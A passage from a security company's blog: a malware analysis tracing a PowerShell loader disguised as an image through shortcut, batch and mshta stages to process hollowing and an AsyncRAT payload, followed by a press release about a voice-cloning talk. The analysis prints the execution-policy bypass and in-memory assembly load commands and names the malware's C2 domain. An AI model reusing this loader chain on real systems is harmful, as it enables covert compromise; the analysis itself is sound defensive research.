center;">1.3</td></tr></tbody></table><br /><p>By downloading and inspecting the “picture” we realise it is PowerShell code (shown in 1.4).</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVjl6ptbZRx4cid5mcYSrPoZA5PLx_mG1XsOwKoXmsTVgsunsYMS2xkeKx9enA0dQ40YwPvZI12wd0Z62jmq4AtnVUTTvKGCwlwqLzIC1srqLPB0QspjE1rDMI_G4T8sgd_IPqY0IbEWmv/s624/Picture+4.png" 
style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="220" data-original-width="624" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVjl6ptbZRx4cid5mcYSrPoZA5PLx_mG1XsOwKoXmsTVgsunsYMS2xkeKx9enA0dQ40YwPvZI12wd0Z62jmq4AtnVUTTvKGCwlwqLzIC1srqLPB0QspjE1rDMI_G4T8sgd_IPqY0IbEWmv/s16000/Picture+4.png" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.4</td></tr></tbody></table><br /><p>The PowerShell that is executed in memory downloads multiple files, replaces and concatenates strings, and performs execution in memory.</p><p>At the beginning of the script, a number of directories are created recursively at the location C:\ProgramData\Microsoft Arts\Start, as shown in the first highlight of screenshot 1.5.</p><p>Further in the script, 3 actions are performed that set 3 locations:</p><p></p><ul style="text-align: left;"><li>C:\ProgramData\Microsoft Arts\Start\</li><li>C:\Users\Public\</li><li>C:\Users\Public\</li></ul><p></p><p>These location paths are obfuscated by replacing random strings placed within them, as shown in the second highlight of 1.5.</p><p>Next, the script downloads 3 files into the above-mentioned locations, respectively, as a .lnk, a .bat and a .ps1, and executes the .lnk file.</p><p><br /></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiMMWw1w5xQr7aX644LGUkmxQmvU6OjbLt7dj_286kcClJ8U5_h_nK3c7Z8VZHUavmV72RMxFjB46inavWFe32RD6HcXVY2QwTZp-3KwdbX_nrCF8gtC6DuLp-eCfBv1qYofEze6-QkOS0/s1430/Picture+5.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="440" data-original-width="1430" height="197" 
src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjiMMWw1w5xQr7aX644LGUkmxQmvU6OjbLt7dj_286kcClJ8U5_h_nK3c7Z8VZHUavmV72RMxFjB46inavWFe32RD6HcXVY2QwTZp-3KwdbX_nrCF8gtC6DuLp-eCfBv1qYofEze6-QkOS0/w640-h197/Picture+5.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.5</td></tr></tbody></table><br /><p>The .lnk file is a shortcut that will execute the .bat file from the second location in 1.6.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKlT_s_CF-Aph0LLVOsKR64pZH4djNIVxtebi7LK2-GIW6he8kwP9A_vnSe7zjfdBbv5T83v3oA8S_bRAUhD6ha6XzETpZ5_4KgysjaALU9LBA72KZoPed-NWP2S2bL1jTlH6H1qm4wDVS/s1445/1.6.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="69" data-original-width="1445" height="31" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKlT_s_CF-Aph0LLVOsKR64pZH4djNIVxtebi7LK2-GIW6he8kwP9A_vnSe7zjfdBbv5T83v3oA8S_bRAUhD6ha6XzETpZ5_4KgysjaALU9LBA72KZoPed-NWP2S2bL1jTlH6H1qm4wDVS/w640-h31/1.6.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.6</td></tr></tbody></table><br /><p>The .bat file executes mshta command with parameters in the command line as vbscript:Execute, to execute through Wscript a PowerShell command in screenshot 1.7.</p><p><br /></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlQ7Fe5fXYet3RdLIFAgirQExcnJPtXbjeKtd3eqCnkoeJzvxI3WTIv9o7A_ljk1-G8eGVExmFqdebdaFFOSpD0FPFMvJpGWCpYK_wOaIasEOXv1z7XWnzrwauevfQeUAVJyigxEhXFoOx/s1430/Picture+7.png" style="margin-left: auto; margin-right: auto;"><img border="0" 
data-original-height="51" data-original-width="1430" height="23" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjlQ7Fe5fXYet3RdLIFAgirQExcnJPtXbjeKtd3eqCnkoeJzvxI3WTIv9o7A_ljk1-G8eGVExmFqdebdaFFOSpD0FPFMvJpGWCpYK_wOaIasEOXv1z7XWnzrwauevfQeUAVJyigxEhXFoOx/w640-h23/Picture+7.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.7</td></tr></tbody></table><br /><p>Once de-obfuscated, the PowerShell command runs the .ps1 file downloaded earlier, with the command-line parameter that bypasses the ExecutionPolicy for scripts.</p><p>powershell -ExecutionPolicy Bypass C:\Users\Public\MIfat7uauRiR3nHRG9cv.ps1</p><p>The .ps1 script contains a short sleep command, 2 sets of shellcode and execution through assembly, shown in the highlights of screenshot 1.8.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyNmXhtxgxQYiY7gYK_mQTLEzmqX7ohdO5MvCLhfRe5x_-mPUoCRbVNXSS_oztoJKdAlP3BRklpqPiYa3fHD_nvhAVHUKmy5LdsdM7SZOZuoIajQxLPmVjNZfSul6joRiZJ-ICsRZi8Xm7/s1430/Picture+8.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="394" data-original-width="1430" height="176" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyNmXhtxgxQYiY7gYK_mQTLEzmqX7ohdO5MvCLhfRe5x_-mPUoCRbVNXSS_oztoJKdAlP3BRklpqPiYa3fHD_nvhAVHUKmy5LdsdM7SZOZuoIajQxLPmVjNZfSul6joRiZJ-ICsRZi8Xm7/w640-h176/Picture+8.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.8</td></tr></tbody></table><p>Each shellcode is obfuscated with a certain pattern that gets replaced with 0; by using find & replace, we get the original shellcodes. 
The shellcodes are stored as strings, hence the function they are passed to, which converts them to bytes.</p><p>After they are converted to bytes, they are saved in Byte variables to be used further in the script.</p><p>One peculiar detail: the variable H5 appears to be defined twice with the exact same payload, which is odd since the second definition changes nothing (see 1.9).</p><p>In addition to all of the above, the last line performs the assembly execution, using the shellcodes and a variable called ali, which holds as a string the aspnet_compiler.exe from the .NET framework.</p><p>Let’s try to obtain the binaries from those shellcodes by saving them to a file after they are converted to bytes, and removing the last line to avoid becoming a victim.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBJamkD3NtsY6OLe3hnW3m6Sc5vv0Kk7s6HYBrDU-Z5DqUoTbYbY98pYYLa1a2PIFdxyU4tELEXldKNbd__2wwneKHtALI2bF780yqpX9yzrVak-W8riXeVMM71dCCpdnr8DGGw1i2rfmH/s520/Picture+9.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="104" data-original-width="520" height="128" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBJamkD3NtsY6OLe3hnW3m6Sc5vv0Kk7s6HYBrDU-Z5DqUoTbYbY98pYYLa1a2PIFdxyU4tELEXldKNbd__2wwneKHtALI2bF780yqpX9yzrVak-W8riXeVMM71dCCpdnr8DGGw1i2rfmH/w640-h128/Picture+9.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.9</td></tr></tbody></table><br /><p>With the files obtained, we perform some initial analysis on them:</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSe55Y5P0EgyIazrjzyF2JmpmER14rZaj0qS8FMyI8lkSQZBUTp3Eft0jYyP0qOh1dx0LsmPZXYa1731XCVdxWcySC0iSkuDq6VhD9TU0hKG9GHJPHGdXkDCboSLJ5R3Rpqc70eWozsMvz/s624/Picture+10.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="244" data-original-width="624" height="250" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSe55Y5P0EgyIazrjzyF2JmpmER14rZaj0qS8FMyI8lkSQZBUTp3Eft0jYyP0qOh1dx0LsmPZXYa1731XCVdxWcySC0iSkuDq6VhD9TU0hKG9GHJPHGdXkDCboSLJ5R3Rpqc70eWozsMvz/w640-h250/Picture+10.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.10</td></tr></tbody></table><br /><p>We will return to the .ps1 script soon, since its last line executes those 2 binaries, but first we need to understand what is happening: H5 is the one that gets loaded for assembly execution.</p><p>By loading the H5 payload in ILSpy we are presented with the below:</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtRDyN9_Aqd9C7tohUdObo52dV-Fbb7CIaJi7lKh7qgssOxRPKBDdsYq1KBKa0yz_7w2gOj4xddxpZ4DQ_YjfDz4lq8PePNDrCtyYtt4ibMBigmy-i1eDYi-u1Lw59cQE-wHelJoIxesT0/s1451/1.11.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" data-original-height="927" data-original-width="1451" height="409" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhtRDyN9_Aqd9C7tohUdObo52dV-Fbb7CIaJi7lKh7qgssOxRPKBDdsYq1KBKa0yz_7w2gOj4xddxpZ4DQ_YjfDz4lq8PePNDrCtyYtt4ibMBigmy-i1eDYi-u1Lw59cQE-wHelJoIxesT0/w640-h409/1.11.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.11</td></tr></tbody></table><p><br /></p><p>From the set of WINAPI calls being executed in screenshot 1.11, we instantly realise that this is 
Process Hollowing injection, which makes perfect sense since the last line uses aspnet_compiler.exe as the host process for this attack and executes the H6 binary, which is the actual malware, in its place.</p><p>The last command is:</p><p>[Reflection.Assembly]::Load($H5).GetType('VNPT.B').GetMethod('NET').Invoke($null,[object[]] ($ali,$H6)) </p><p>The H5 binary is loaded in memory and the method NET of VNPT.B is invoked with aspnet_compiler.exe and the H6 binary as parameters, as shown in screenshot 1.12.</p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSGfMYLTQ238dKR5ahBsGXxqe1pa3aCNWi62YX0NzXIIY7RSJhwU6-a0L-Rg2DcOzC6nHAYrkooiYR2qYrRJFG_Ev094VBB81mfkexm1Lh0-CtTNzC1b9DsptKDCmMxAbRnzV63zmacJlc/s1177/1.12.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="185" data-original-width="1177" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiSGfMYLTQ238dKR5ahBsGXxqe1pa3aCNWi62YX0NzXIIY7RSJhwU6-a0L-Rg2DcOzC6nHAYrkooiYR2qYrRJFG_Ev094VBB81mfkexm1Lh0-CtTNzC1b9DsptKDCmMxAbRnzV63zmacJlc/w640-h101/1.12.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.12</td></tr></tbody></table><div class="separator" style="clear: both; text-align: center;"><br /></div><p>Next, let’s have a look at what the actual malware can do.</p><p>The H6 binary is obfuscated and uses encryption through a key, has multiple evasion features against debugging and VMs (shown in screenshot 1.13), and performs recon of the host for its hostname, AV product (shown in screenshot 1.14) etc.</p><p><br /></p><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnlqlALXUgRWb8A53xfBlRuYlv5zLzew0u1bImyhM1M2zn75cZ27ZjCxkMSF9poc8tqPByBkxkHeL8eh_TxypvjMlROyGc4kSOSDwwlprYd_A3-uOHqHqG6sOxv-31Vkg-pnDYmtsRjiH_/s1354/1.13.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="538" data-original-width="1354" height="254" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhnlqlALXUgRWb8A53xfBlRuYlv5zLzew0u1bImyhM1M2zn75cZ27ZjCxkMSF9poc8tqPByBkxkHeL8eh_TxypvjMlROyGc4kSOSDwwlprYd_A3-uOHqHqG6sOxv-31Vkg-pnDYmtsRjiH_/w640-h254/1.13.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.13</td></tr></tbody></table><br /><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7fI52HZCwguje3JoO0sllHw5hOW0_aB2hK97VIMsqeQ4nzVFy2eSwBW4Dl3w3fm6P4O8OqoWhmR8IUbFBhhp_2FX4XI2NR_gdm7Vy9TH6YN4eC-IPq9Jm0IQBwZaunU6Iea_Mjk2RxJsg/s1400/1.14.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="335" data-original-width="1400" height="153" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh7fI52HZCwguje3JoO0sllHw5hOW0_aB2hK97VIMsqeQ4nzVFy2eSwBW4Dl3w3fm6P4O8OqoWhmR8IUbFBhhp_2FX4XI2NR_gdm7Vy9TH6YN4eC-IPq9Jm0IQBwZaunU6Iea_Mjk2RxJsg/w640-h153/1.14.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.14</td></tr></tbody></table><p>Below you can see some of its features, as shown in screenshot 1.15, as well as its persistence through scheduled tasks on logon that execute a .bat file, as shown in screenshot 1.16.</p><div><br /></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a 
href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPMj0wItNU4h05e3NJBS9P7EN2vik7UjBI8IHVIXmokt8viuMZwY7BrQRRPn7MdTNSthUAWU1pbegM_aaOaluOia4ebu5FJ1NVCngxB1PMFQ-JUUtllOx17bgBB87IpZPn7r05mTsfri8f/s1203/1.15.png" imageanchor="1" style="margin-left: auto; margin-right: auto; text-align: center;"><img border="0" data-original-height="1203" data-original-width="1060" height="640" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgPMj0wItNU4h05e3NJBS9P7EN2vik7UjBI8IHVIXmokt8viuMZwY7BrQRRPn7MdTNSthUAWU1pbegM_aaOaluOia4ebu5FJ1NVCngxB1PMFQ-JUUtllOx17bgBB87IpZPn7r05mTsfri8f/w564-h640/1.15.png" width="564" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.15</td></tr></tbody></table><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLP-ZyRYKl1rpB9YKgx-MrUJIvTQlT8hBPTus56-IghLi-B3ndmcbr8oFcs-9tJzDiLOaU529putkgb6919y5ObWt_dLft-_FUFA0IRAdBl6LmUz6J8pnZJ3rcyaANXSjtEJETpabIUikQ/s1418/1.16.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="919" data-original-width="1418" height="415" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhLP-ZyRYKl1rpB9YKgx-MrUJIvTQlT8hBPTus56-IghLi-B3ndmcbr8oFcs-9tJzDiLOaU529putkgb6919y5ObWt_dLft-_FUFA0IRAdBl6LmUz6J8pnZJ3rcyaANXSjtEJETpabIUikQ/w640-h415/1.16.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.16</td></tr></tbody></table><p>The malware tries to reach back to the C2 domain fat7e114.ddns.net on port 6666, but it also tries to reach the windowsupdate.com domain, possibly to look legitimate, as observed in screenshot 1.17.</p><div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto;"><tbody><tr><td style="text-align: 
center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF9QLZ_6mBJNkFHQ6Ha9jz4TL_EcHjQiBUhm5jvs0nuyrn6uphHckg6AHmZY14wB2Qbm3Af_IlGRV4n1XuRiTMQ0riKwIx_HQmT82QsAC4tU_gqtNji6NpsGIH6hUKGVbaPO3qwH09Ou3-/s624/Picture+17.png" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="56" data-original-width="624" height="58" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjF9QLZ_6mBJNkFHQ6Ha9jz4TL_EcHjQiBUhm5jvs0nuyrn6uphHckg6AHmZY14wB2Qbm3Af_IlGRV4n1XuRiTMQ0riKwIx_HQmT82QsAC4tU_gqtNji6NpsGIH6hUKGVbaPO3qwH09Ou3-/w640-h58/Picture+17.png" width="640" /></a></td></tr><tr><td class="tr-caption" style="text-align: center;">1.17</td></tr></tbody></table><br /><p>In conclusion, according to public resources, the H6 binary is AsyncRAT. </p><p><br /></p><p>- Blog post by Thanasis (trickster0) of Telspace Systems</p></div>break2fixhttp://www.blogger.com/profile/06040620743029387401noreply@blogger.com0tag:blogger.com,1999:blog-2540168616552398462.post-62849559027730014622021-04-01T16:21:00.001+02:002021-04-01T16:21:58.727+02:00Telspace Systems Security Analyst Speaks about “Voice Cloning” Attacks<p><br /></p><div style="background-color: white; border-bottom-color: windowtext; border-bottom-width: 1pt; border-style: none; padding: 0cm 0cm 11pt;"><p align="center" class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: center;"><i><span lang="EN">Amy Manià to Appear at The Boston Security Meetup in April 2021</span><span lang="EN"><o:p></o:p></span></i></p><p align="center" class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: center;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p> </o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; 
font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><b><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">SOUTH AFRICA, JOHANNESBURG – March 17 2021 –</span></b><b><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span></b><span lang="EN"><a href="https://www.telspace.co.za/" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px;">Telspace Systems</span></a></span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;">, </span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">a provider of vendor-independent Information / Cyber security solutions for the public and private sectors across a broad array of industries, both local and international, announces today that one of its OSCP Certified Security Analysts, Amy Manià, will be speaking on the subject of Deep Fake and Voice Cloning at the prestigious </span><span lang="EN"><a href="https://www.meetup.com/The-Boston-Security-Meetup/" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px;">Boston Security Meeting</span></a></span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"> in Cambridge, MA, in mid-April (date not yet finalised). 
The Meetup is a self-described “safe place” for InfoSec people to come meet like-minded people, share “cool ideas,” and discuss real issues.</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p> </o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">The Boston area has one of the most diverse information security ecosystems in the world and the Meetup will serve as a springboard to further shine a spotlight on Ms. Manià’s industry-leading research and insights to help prevent businesses from falling victim to cyber-attacks, deep fakes, and how to keep sensitive information safe. </span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p> </o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">“Telspace underscores its commitment to protecting our customer’s financial and customer data,” states Dino Covotsos, Founder and CEO of Telspace Systems. 
“We see prevention as a vital aspect including educating the public, training security analysts, and helping customers get out ahead of the latest attacker tactics, techniques and procedures (TTPs).”</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p> </o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">“When watching Deep Fake videos, I quickly realized that the software capabilities of manipulating visual material seemed to be far ahead of the audio,” states Amy Manià. “That is how </span><span lang="EN" style="color: #1d2228; font-size: 10.5pt; line-height: 16.100000381469727px;">I began to wonder about the possibilities of cloning a voice. In 2019, I was able to fool my father and a longtime friend using a software-generated version of my own voice.”</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="color: #1d2228; font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p> </o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="color: #1d2228; font-size: 10.5pt; line-height: 16.100000381469727px;">Ms. 
Mani</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">à</span><span lang="EN" style="color: #1d2228; font-size: 10.5pt; line-height: 16.100000381469727px;">’s body of research, entitled "Put Words In My Mouth" may be explored at </span><span lang="EN"><a href="http://the-munx.com/" style="color: purple;"><span style="color: #196ad4; font-size: 10.5pt; line-height: 16.100000381469727px;">the-munx.com</span></a></span><span lang="EN" style="color: #1d2228; font-size: 10.5pt; line-height: 16.100000381469727px;">. This links to one of her podcast appearances, a whitepaper, and recorded conference talks.<o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"> </span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">To learn more about Telspace Systems, please visit</span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span><span lang="EN"><a href="https://www.telspace.com/" style="color: purple;"><span style="font-size: 10.5pt; line-height: 16.100000381469727px;">https://www.telspace.com/</span></a></span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;">. 
<o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span></p><p align="center" class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: center;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"># # #</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><b><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">About Telspace Systems</span></b><b><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></b></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">Since 2002, Telspace Systems, headquartered in South Africa, has provided information / cyber security solutions for the public and private sectors both locally and internationally. Telspace focuses on vendor-independent reporting methodologies and serves a broad array of industries, including governmental, financial services, telecommunications, petroleum, logistics, entertainment, transportation, legal, human resource, and ISP’s. 
To learn more, please visit </span><span lang="EN"><a href="https://www.telspace.com/" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px;">Telspace Systems</span></a></span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">and follow us on</span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span><span lang="EN"><a href="https://www.linkedin.com/company/telspace-systems/" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px;">LinkedIn</span></a></span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;">, </span><span lang="EN"><a href="https://www.facebook.com/telspacesystems" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px;">Facebook</span></a></span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">, and</span><span lang="EN" style="color: #666666; font-size: 10.5pt; line-height: 16.100000381469727px;"> </span><span lang="EN"><a href="https://twitter.com/telspacesystems" style="color: purple;"><span style="color: #1155cc; font-size: 10.5pt; line-height: 16.100000381469727px; text-decoration: none;">Twitter</span></a></span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">.</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><br /></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: 
justify;"><b><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">Media Contact for Telspace Systems:</span></b><b><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></b></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">Media Team</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">Tel: +27 10 590 6163</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p><p class="MsoNormal" style="border: none; font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; padding: 0cm; text-align: justify;"><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;">Email: services@telspace.com</span><span lang="EN" style="font-size: 10.5pt; line-height: 16.100000381469727px;"><o:p></o:p></span></p></div><p class="MsoNormal" style="font-family: Arial, sans-serif; font-size: 11pt; line-height: 16.866666793823242px; margin: 0cm; text-align: justify;"><span lang="EN" style="font-size: 